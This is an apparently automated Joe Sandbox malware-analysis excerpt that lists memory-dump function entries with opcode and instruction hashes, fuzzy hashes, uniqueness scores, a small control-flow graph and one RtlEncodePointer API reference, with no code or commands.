                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: 8b33e674f460d44c973df0efeb7e1971ef64fbe7a44f8175f9187afe5ac4acec
                                                  • Instruction ID: 47c8465b460214f48c476248a19f6bdbd24f6de4880e37eb3319a0b8bd1bbf49
                                                  • Opcode Fuzzy Hash: 8b33e674f460d44c973df0efeb7e1971ef64fbe7a44f8175f9187afe5ac4acec
                                                  • Instruction Fuzzy Hash: 372188B19003458FCF60CFA8C64979EBBF4EB4A314F10886AD409E3700C738A809CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 995 777968-7779aa 998 7779b0 995->998 999 7779ac-7779ae 995->999 1000 7779b5-7779c0 998->1000 999->1000 1001 7779c2-7779f3 RtlEncodePointer 1000->1001 1002 777a21-777a2e 1000->1002 1004 7779f5-7779fb 1001->1004 1005 7779fc-777a1c 1001->1005 1004->1005 1005->1002
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 007779E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326385567.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_770000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: e81421511d5fead489d780ff30d290f2d66a84b9a28f2b505880b86857511c20
                                                  • Instruction ID: 8babbe9e1a5a26ae26820feafce701905f8a051a21e537574b657054cbf728be
                                                  • Opcode Fuzzy Hash: e81421511d5fead489d780ff30d290f2d66a84b9a28f2b505880b86857511c20
                                                  • Instruction Fuzzy Hash: 90116AB19013098FDF50CFA9C54979EBBF4FB4A354F108429D409A3700C779A948CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9756f3ed31ec8d9db9f8630d625157f236fa31e9bba5049e042802569a895cb
                                                  • Instruction ID: 831b5383cd2f7bc8cc9e2022c3c3bf6e81ddfc1660657087a280c1d9821bdefc
                                                  • Opcode Fuzzy Hash: c9756f3ed31ec8d9db9f8630d625157f236fa31e9bba5049e042802569a895cb
                                                  • Instruction Fuzzy Hash: 732126B1504204EFDB15CF60E9C8B26BBA5FB88314F24C9A9E8094B746C33ADC56CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71417f1db7437d459753c0eb3f997d01ccbf02fc48efe8788b7dae8a6caf91be
                                                  • Instruction ID: 4a79fae321a22d43d21dae2c2b092936fcd244483708a6688f9884edab23cf1c
                                                  • Opcode Fuzzy Hash: 71417f1db7437d459753c0eb3f997d01ccbf02fc48efe8788b7dae8a6caf91be
                                                  • Instruction Fuzzy Hash: 9A21F575504244DFDB14DF10E9C4B16BBA5FB88314F24C969E8494B746C33ADC46CA62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction ID: 9e6cdb6769cad01fd959705c420cde53403032b33af8b50088786dea4d2b5519
                                                  • Opcode Fuzzy Hash: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction Fuzzy Hash: 5C119D75504280DFCB15CF14E5D4B15BBB1FB84324F28C6A9D8494B656C33AD84ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.326297332.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72d000_PI#53034601506400.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction ID: 134f38ca9fb786e6d4646478e4ac4088644b1994f910b3848702912c8c75b883
                                                  • Opcode Fuzzy Hash: 61856b6ff38b53652fb43e72ebe0fd453e6ac8daa1939b7cb2f24f50dfbc4e7c
                                                  • Instruction Fuzzy Hash: 57119D75504280DFCB12CF50E5C4B15BBB1FB89324F28C6A9DC494B656C33AD84ACB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%